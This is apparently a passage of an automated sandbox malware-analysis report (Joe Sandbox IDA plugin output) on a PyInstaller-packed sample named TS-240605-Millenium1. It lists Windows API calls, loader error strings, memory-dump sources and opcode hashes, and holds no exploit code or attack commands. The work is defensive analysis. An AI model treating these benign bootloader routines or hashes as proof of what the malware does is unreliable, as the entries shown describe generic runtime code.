                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB28FA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                          • API String ID: 3723044601-27947307
                                                                                          • Opcode ID: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                          • Instruction ID: 65384fbbcef2ec1e32a076b0817e22cd34c62da3fe9bc81ebba4b7ca48a8c276
                                                                                          • Opcode Fuzzy Hash: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                          • Instruction Fuzzy Hash: 2D216D21B09B4295EB10DF15EA44079B372EFA5B82F544A36FA8DE7794EF3CE5018304
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                          • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                          • API String ID: 3231891352-3501660386
                                                                                          • Opcode ID: 12de4fbda132ce6cb05f4d8d3af4badfde23b35f2f99a9828bec22b31e5f261e
                                                                                          • Instruction ID: 0c866e042ab735a57664bae824cbc66f36332de55f6bbbb53f069ebae5eac242
                                                                                          • Opcode Fuzzy Hash: 12de4fbda132ce6cb05f4d8d3af4badfde23b35f2f99a9828bec22b31e5f261e
                                                                                          • Instruction Fuzzy Hash: FA51A021A0D75351FA11AF26AB196B962B19FB7BC2F480131F9CDEB7D6DE2CE4008704
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6CEB27BB1,00000000,?,00000000,00000000,?,00007FF6CEB2153F), ref: 00007FF6CEB2768F
                                                                                            • Part of subcall function 00007FF6CEB22B10: MessageBoxW.USER32 ref: 00007FF6CEB22BE5
                                                                                          Strings
                                                                                          • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6CEB27666
                                                                                          • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6CEB276A3
                                                                                          • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6CEB276EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                          • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                          • API String ID: 1662231829-3498232454
                                                                                          • Opcode ID: c86ba785b39e1744ff17e8f21851e01a02fd234bd2ff69c05b5589a30fcca8ce
                                                                                          • Instruction ID: f9749c67d5c5bd4ae0701217b88e6ea3820a9a33d0071b862bbc05b63a81a9e4
                                                                                          • Opcode Fuzzy Hash: c86ba785b39e1744ff17e8f21851e01a02fd234bd2ff69c05b5589a30fcca8ce
                                                                                          • Instruction Fuzzy Hash: AC319511B1C74241FA619F25D75A3BA52B1AFBA7C2F440432FACEE36D6EE2CE1048604
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E44D
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E45B
                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E485
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E4F3
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E4FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 2559590344-2084034818
                                                                                          • Opcode ID: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                          • Instruction ID: 94feb048879a9299bcd498304c92457248b652d5f59f2dc0c414d23cf29e3253
                                                                                          • Opcode Fuzzy Hash: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                          • Instruction Fuzzy Hash: B531B222F1A64291FE12DF0796045B923B4BF76BA1F190535FDADAB7A4DE3CE4808700
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A
                                                                                            • Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
                                                                                            • Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0
                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28EA0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                          • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                          • API String ID: 3723044601-876015163
                                                                                          • Opcode ID: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                          • Instruction ID: 5a05ba6fe037c98f5de85ef44a66e0c5d61dbc84791183a69b0add5eb5e23f55
                                                                                          • Opcode Fuzzy Hash: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                          • Instruction Fuzzy Hash: EB214422B08A4281EB50DF29F540079A371FFA97C5F584532EB8CE7B69EE3CD5418700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2506987500-0
                                                                                          • Opcode ID: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                                                          • Instruction ID: 104a83e5767e291dd1ec8dbcda8a94449b96129f12100fd5cb75ac4c206c2252
                                                                                          • Opcode Fuzzy Hash: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                                                          • Instruction Fuzzy Hash: 90217F24A0D20243FA686F21979717962724F667B2F141734F8FEE76CADE2CB8004B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                          • String ID: CONOUT$
                                                                                          • API String ID: 3230265001-3130406586
                                                                                          • Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                          • Instruction ID: 32b9f626b619e4aff2bbce649f8f3dd74ce58e290f8dc0c724b1289867a52ed1
                                                                                          • Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                          • Instruction Fuzzy Hash: CB118122A18A4186F3508F46E944339B6B0FBA9FE5F000235FA9DD7794DF3CE5448B40
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C087
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C0BD
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C0EA
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C0FB
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C10C
                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C127
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2506987500-0
                                                                                          • Opcode ID: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                                                          • Instruction ID: 27aea83272919a7ff10a2fa152fc60f93dbd572c9a675ff45c14de8751a3776a
                                                                                          • Opcode Fuzzy Hash: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                                                          • Instruction Fuzzy Hash: 2A11AE20A4C68343FA54AF61A78307962728F667B2F140735F8AEF76C6DE2CB4414700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                          • String ID: Unhandled exception in script
                                                                                          • API String ID: 3081866767-2699770090
                                                                                          • Opcode ID: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
                                                                                          • Instruction ID: f5af6dee7187d0fa2c2a4dded5393a7d4e44a3ac74615bac16369137cfd845c5
                                                                                          • Opcode Fuzzy Hash: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
                                                                                          • Instruction Fuzzy Hash: CB314E32A09A8285EB20DF21EA551FA6374FF9AB85F440136FA8D9BB59DF3CD505C700
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
                                                                                            • Part of subcall function 00007FF6CEB28770: GetLastError.KERNEL32(00000000,00007FF6CEB22A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28797
                                                                                            • Part of subcall function 00007FF6CEB28770: FormatMessageW.KERNEL32 ref: 00007FF6CEB287C6
                                                                                            • Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A
                                                                                          • MessageBoxW.USER32 ref: 00007FF6CEB22AD0
                                                                                          • MessageBoxA.USER32 ref: 00007FF6CEB22AEC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                          • API String ID: 2806210788-2410924014
                                                                                          • Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                          • Instruction ID: 89329c1c8542c3eeb3f35c8974cf028e56dc5d9db2c49d930e02d5ed46fc405b
                                                                                          • Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                          • Instruction Fuzzy Hash: 31314172628A8281E630DF10E5556FA6374FFA5BC5F804036FACDA6A59DF3CD605CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                          • Instruction ID: c6bd174c17174d6468024502a825bc5aee3a92a76e87c523196185f487fc086b
                                                                                          • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                          • Instruction Fuzzy Hash: 37F0C862B0960681FB118F14E5453352330AF6AB52F54063AE6AE966F4CF2CE049C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID:
                                                                                          • API String ID: 1156100317-0
                                                                                          • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                          • Instruction ID: f61b9117f49d744cccaa70204b5ee2eff4a1db5fff6392c1fe1c811bc3b09680
                                                                                          • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                          • Instruction Fuzzy Hash: 5A117722E1CA0B01FA5419A9E74A37D21616FB7372F140637F5EEB66F7EE2C68404104
                                                                                          APIs
                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C15F
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C17E
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C1A6
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C1B7
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C1C8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                                                          • Instruction ID: 3f28026980f7f94f7b15d9a6c3a5c27fafd5f8a850634ed83f8ec2e57bf44ccc
                                                                                          • Opcode Fuzzy Hash: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                                                          • Instruction Fuzzy Hash: D4116020B4960243FA989B65AB431B961725F663B2F144334F9BDF76C6DE2CB4019610
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                                                          • Instruction ID: 76545c4723bb14409d62e9fdf7cdac852c559a6302b9858d49a78dcc7c491607
                                                                                          • Opcode Fuzzy Hash: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                                                          • Instruction Fuzzy Hash: 4B111810A4924743F9A8AE6197531B921724F67376F280734F9BEFB2D6DE2CB8014610
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
